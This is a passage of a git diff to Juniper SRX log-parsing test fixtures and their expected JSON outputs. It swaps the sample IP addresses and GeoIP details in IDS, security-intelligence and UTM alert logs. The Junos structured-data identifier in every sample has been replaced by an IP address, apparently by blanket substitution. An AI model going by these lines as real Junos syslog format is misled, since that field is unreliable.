"port": 50630, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -901,18 +924,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 50630, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341283102Z", - "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name=\"TCP port scan!\" source-address=\"1.128.3.4\" source-port=\"50630\" destination-address=\"81.2.69.143\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921023300Z", + "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", "category": [ @@ -930,36 +953,18 @@ { "server": { "port": 7, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 7, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "source": { "port": 42799, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -990,18 +995,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 42799, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341286288Z", - "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name=\"FIN but no ACK bit!\" source-address=\"1.128.3.4\" source-port=\"42799\" destination-address=\"81.2.69.143\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921026800Z", + "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", "category": [ diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log index 907187c2cb2..b43a6c7153d 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log @@ -1,2 +1,2 @@ -<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="216.160.83.61" source-port="1" destination-address="216.160.83.57" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"] -<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="216.160.83.61" source-port="36612" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] +<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.15" source-port="1" destination-address="67.43.156.15" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"] +<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="67.43.156.15" source-port="36612" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json index 599c2676e26..1857294dc94 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json @@ -3,48 +3,42 @@ { "server": { "port": 24039, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24039, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -85,18 +79,17 @@ }, "related": { "ip": [ - "216.160.83.61", - "216.160.83.57" + "67.43.156.15" ] }, "client": { "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.034353969Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"216.160.83.61\" source-port=\"1\" destination-address=\"216.160.83.57\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", + "ingested": "2021-12-10T10:16:21.215076300Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"67.43.156.15\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -114,48 +107,42 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -204,18 +191,17 @@ "dummy_host" ], "ip": [ - "216.160.83.61", - "216.160.83.57" + "67.43.156.15" ] }, "client": { "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.034371021Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"216.160.83.61\" source-port=\"36612\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", + "ingested": "2021-12-10T10:16:21.215086900Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", "category": [ diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log index 2e833e5324c..5ba1c282674 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log @@ -1,12 +1,12 @@ -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="1402" destination-address="175.16.199.1" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"] -<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] -<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"] -<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"] -<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="1.128.3.4" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"] -<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"] -<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] -<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="58974" destination-address="175.16.199.1" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"] -<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="59075" destination-address="175.16.199.1" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"] -<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address="10.10.10.50" source-port="1402" destination-address="67.43.156.13" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"] +<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="67.43.156.12" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] +<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address="67.43.156.14" source-port="80" destination-address="67.43.156.12" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"] +<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address="10.2.1.101" source-port="80" destination-address="67.43.156.12" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"] +<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"] +<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.168.2.3" source-port="58071" destination-address="192.168.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"] +<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="67.43.156.12" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] +<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="67.43.156.14" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"] +<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="67.43.156.13" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"] +<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="67.43.156.13" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json index 39ffc643d35..7ddd99dbc81 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json @@ -3,7 +3,7 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" @@ -11,31 +11,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01" }, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "juniper": { "srx": { @@ -71,18 +65,18 @@ "www.baidu.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.1.100", + "67.43.156.13" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760750640Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252523600Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -100,7 +94,7 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" @@ -108,31 +102,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 1402, "user": { "name": "user02" }, - "ip": "1.128.3.4" + "ip": "10.10.10.50" }, "juniper": { "srx": { @@ -167,18 +155,18 @@ "www.checkpoint.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.10.10.50", + "67.43.156.13" ] }, "client": { "port": 1402, - "ip": "1.128.3.4" + "ip": "10.10.10.50" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760781337Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"1402\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252604700Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ "network" @@ -193,7 +181,7 @@ { "server": { "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" @@ -201,28 +189,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -259,18 +253,18 @@ "EICAR-Test-File" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760860095Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:16:22.252608600Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -288,7 +282,7 @@ { "server": { "port": 33578, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" @@ -296,28 +290,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33578, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -345,18 +345,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.14", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760870525Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", + "ingested": "2021-12-10T10:16:22.252613900Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", 